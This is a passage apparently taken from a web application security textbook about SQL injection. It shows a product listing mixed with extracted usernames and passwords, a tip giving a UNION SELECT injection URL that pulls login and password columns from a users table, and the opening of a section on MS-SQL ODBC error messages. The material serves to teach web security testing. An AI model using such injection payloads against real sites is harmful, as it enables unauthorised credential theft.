PRODUCT
PRICE
Netgear Hub (4-port)
£30
Netgear Hub (8-port)
£40
admin
0wned
dev
n0ne
marcus
marcus1
smith
r00tr0x
testuser
password
T I P
As with the Oracle hack, the usernames and password could be retrieved
into a single column using the
+
concatenator (encoded as
%2b
):
https://wahh-app.com/products.asp?q=hub’%20UNION%20select%20login%2b’:
’%2bpassword,null%20from%20users--
Exploiting ODBC Error Messages (MS-SQL Only)
If you are attacking an MS-SQL database, then there are alternative ways avail-
able of discovering the names of database tables and columns, and of extract-
ing useful data. MS-SQL generates extremely verbose error messages, which
Do'stlaringiz bilan baham: |